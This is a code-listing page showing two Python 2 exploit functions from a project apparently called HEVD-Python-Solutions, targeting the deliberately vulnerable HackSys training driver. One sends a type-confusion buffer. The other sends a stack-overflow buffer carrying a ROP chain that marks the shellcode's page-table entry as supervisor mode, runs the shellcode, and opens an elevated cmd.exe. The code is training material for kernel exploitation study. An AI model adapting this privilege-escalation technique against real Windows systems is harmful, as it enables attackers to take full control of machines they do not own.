HEVD_typeconfusion.py 文件源码 项目:HEVD-Python-Solutions 作者: GradiusX 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def trigger_type_confusion():
    """Exercise the type-confusion IOCTL (0x222023) of the HEVD training
    driver and spawn cmd.exe if the process ends up elevated.

    Python 2 code.  Relies on module-level names not shown here: kernel32,
    ctypes, struct, shell, os, sys, c_ulong, byref and heap_alloc_payload().
    """
    dwReturn      = c_ulong()
    # Open the driver's device object; exit if that fails (GetLastError() gives the reason).
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()

    ####
    #   typedef struct _USER_TYPE_CONFUSION_OBJECT {
    #       ULONG ObjectID;
    #       ULONG ObjectType;
    #   } USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;
    ####

    print "[+] Constructing USER_TYPE_CONFUSION_OBJECT"
    # 4 bytes of filler for ObjectID followed by a packed 32-bit ObjectType.
    evil_input = "\x41" * 4 + struct.pack("<L",heap_alloc_payload())
    # CPython-2-specific: derives a raw address from id(); not portable.
    evil_input_ptr = id(evil_input) + 20
    evil_size  = len(evil_input)
    print "[+] Buf size: %d" % evil_size
    print "[+] Sending confusion object"
    print "[+] Triggering vuln .."
    dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x222023, evil_input_ptr, evil_size, None, 0,byref(dwReturn)   , None)  # result unused

    # driver_handle is never closed.
    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[!] Exploit did not work. Re-run it!"
HEVD_stackoverflow.py 文件源码 项目:HEVD-Python-Solutions 作者: GradiusX 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def trigger_stack_overflow():
    """Exercise the stack-overflow IOCTL (0x222003) of the HEVD training
    driver (64-bit variant) and spawn cmd.exe if the process ends up elevated.

    Python 2 code.  Relies on module-level names not shown here: kernel32,
    ctypes, struct, shell, os, sys, c_ulong, byref, debug_print(),
    get_base_address(), virtual_alloc_payload() and get_pxe_address().
    The module offsets packed below are hard-coded for one specific build of
    hal.dll / win32kfull.sys and are not valid elsewhere.
    """
    dwReturn      = c_ulong()
    # Open the driver's device object; exit if that fails (GetLastError() gives the reason).
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        debug_print ("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit()

    # Resolved at runtime by a helper defined elsewhere; order matches the list passed in.
    base_addresses = get_base_address(["hal.dll", "win32kfull.sys"])
    hal_base_address = base_addresses[0]
    win32kfull_base_address = base_addresses[1]

    shellcode_ptr = virtual_alloc_payload()

    debug_print ("[+] Constructing malicious buffer w/ ROP chain")
    evil_input = "\x41" * 0x808                                             # junk
    evil_input += struct.pack("<Q", win32kfull_base_address + 0xD1122)      # POP RDX; RETN
    evil_input += struct.pack("<Q", 0x63000000)                             # 0x63000000 -> Supervisor Mode
    evil_input += struct.pack("<Q", hal_base_address + 0xFDB2)              # POP RAX; RETN
    evil_input += struct.pack("<Q", get_pxe_address(shellcode_ptr) - 3)     # PTE(shellcode ptr) - 3
    evil_input += struct.pack("<Q", hal_base_address + 0x9943)              # MOV [RAX], EDX; RETN
    evil_input += struct.pack("<Q", hal_base_address + 0x19B20)             # Invalidate Cache
    evil_input += struct.pack("<Q", shellcode_ptr)                          # shellcode ptr

    evil_size  = len(evil_input)
    # CPython-2-specific: derives a raw address from id() (64-bit object header here); not portable.
    evil_input_ptr = id(evil_input) + 32
    debug_print ("[+] Buf size: 0x%X" % evil_size)
    debug_print ("[+] Sending malicious buffer")
    debug_print ("[+] Triggering vuln ..")

    # driver_handle is never closed.
    kernel32.DeviceIoControl(driver_handle, 0x222003, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None)

    if shell.IsUserAnAdmin():
        debug_print ("[*] Enjoy Elevated Privs !\n")
        os.system('cmd.exe')
    else:
        debug_print ("[!] Exploit did not work. Re-run it!")

